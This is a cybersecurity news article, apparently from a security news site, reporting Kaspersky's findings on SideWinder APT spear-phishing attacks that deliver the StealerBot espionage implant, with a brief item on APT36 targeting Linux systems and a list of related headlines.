Headline
SideWinder APT Strikes Middle East and Africa With Stealthy Multi-Stage Attack
An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa. The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. "
An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa.
The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04.
“The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations,” Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov said.
Targets of the attacks include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities, and oil trading companies located in Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey, and the U.A.E.
SideWinder has also been observed setting its sights on diplomatic entities in Afghanistan, France, China, India, Indonesia, and Morocco.
The most significant aspect of the recent campaign is the use of a multi-stage infection chain to deliver a previously unknown post-exploitation toolkit called StealerBot.
It all commences with a spear-phishing email with an attachment – either a ZIP archive containing a Windows shortcut (LNK) file or a Microsoft Office document – that, in turn, executes a series of intermediate JavaScript and .NET downloaders to ultimately deploy the StealerBot malware.
The documents rely on the tried-and-tested technique of remote template injection to download an RTF file that is stored on an adversary-controlled remote server. The RTF file, for its part, triggers an exploit for CVE-2017-11882, to execute JavaScript code that’s responsible for running additional JavaScript code hosted on mofa-gov-sa.direct888[.]net.
On the other hand, the LNK file employs the mshta.exe utility, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files, to run the same JavaScript code hosted on a malicious website controlled by the attacker.
The JavaScript malware serves to extract an embedded Base64-encoded string, a .NET library named “App.dll” that collects system information and functions as a downloader for a second .NET payload from a server (“ModuleInstaller.dll”).
ModuleInstaller is also a downloader, but one that’s equipped to maintain persistence on the host, execute a backdoor loader module, and retrieve next-stage components. But in an interesting twist, the manner in which they are run is determined by what endpoint security solution is installed on the host.
“The Bbckdoor loader module has been observed since 2020,” the researchers said, pointing out its ability to evade detection and avoid running in sandboxed environments. “It has remained almost the same over the years.”
“It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension.”
The end goal of the attacks is to drop StealerBot via the Backdoor loader module. Described as a .NET-based “advanced modular implant,” it is specifically geared to facilitate espionage activities by fetching several plugins to -
- Install additional malware using a C++ downloader
- Capture screenshots
- Log keystrokes
- Steal passwords from browsers
- Intercept RDP credentials
- Steal files
- Start reverse shell
- Phish Windows credentials, and
- Escalate privileges bypassing User Account Control (UAC)
“The implant consists of different modules loaded by the main ‘Orchestrator,’ which is responsible for communicating with the [command-and-control] and executing and managing the plugins,” the researchers said. “The Orchestrator is usually loaded by the backdoor loader module.”
Kaspersky said it detected two installer components – named InstallerPayload and InstallerPayload_NET – that don’t feature as part of the attack chain, but are used to install StealerBot to likely update to a new version or infect another user.
The expansion of SideWinder’s geographic reach and its use of a new sophisticated toolkit comes as cybersecurity company Cyfirma detailed new infrastructure running the Mythic post-exploitation framework and linked to Transparent Tribe (aka APT36), a threat actor believed to be of Pakistani origin.
“The group is distributing malicious Linux desktop entry files disguised as PDFs,” it said. “These files execute scripts to download and run malicious binaries from remote servers, establishing persistent access and evading detection.”
“APT36 is increasingly targeting Linux environments due to their widespread use in Indian government sectors, particularly with the Debian-based BOSS OS and the introduction of Maya OS.”
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Related news
The U.S. Justice Department (DoJ) on Friday announced the seizure of online infrastructure that was used to sell a remote access trojan (RAT) called Warzone RAT. The domains – www.warzone[.]ws and three others – were "used to sell computer malware used by cybercriminals to secretly access and steal data from victims' computers," the DoJ said. Alongside the takedown, the
The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year. Cloud Atlas, active since at
Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called Agent Tesla. The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office's
By Deeba Ahmed FortiGuard Discovers Phishing Campaign Distributing New Agent Tesla Variant to Windows Devices. This is a post from HackRead.com Read the original post: New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs
By Deeba Ahmed An APT group known as Tonto Team has tried targeting the Singapore-based Group-IB cybersecurity firm for the second time. This is a post from HackRead.com Read the original post: Chinese Hackers Keep Targeting Group-IB Cybersecurity Firm
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
Over a dozen military-industrial complex enterprises and public institutions in Afghanistan and Europe have come under a wave of targeted attacks since January 2022 to steal confidential data by simultaneously making use of six different backdoors. Russian cybersecurity firm Kaspersky attributed the attacks "with a high degree of confidence" to a China-linked threat actor tracked by Proofpoint
The dangerous malware appears to be well and truly back in action, sporting new variants and security-dodging behaviors in a wave of recent phishing campaigns.
An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020. "Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their
Notable new infection chain uses PDF to embed malicious files, load remote exploits, shellcode encryption, and more, new research shows.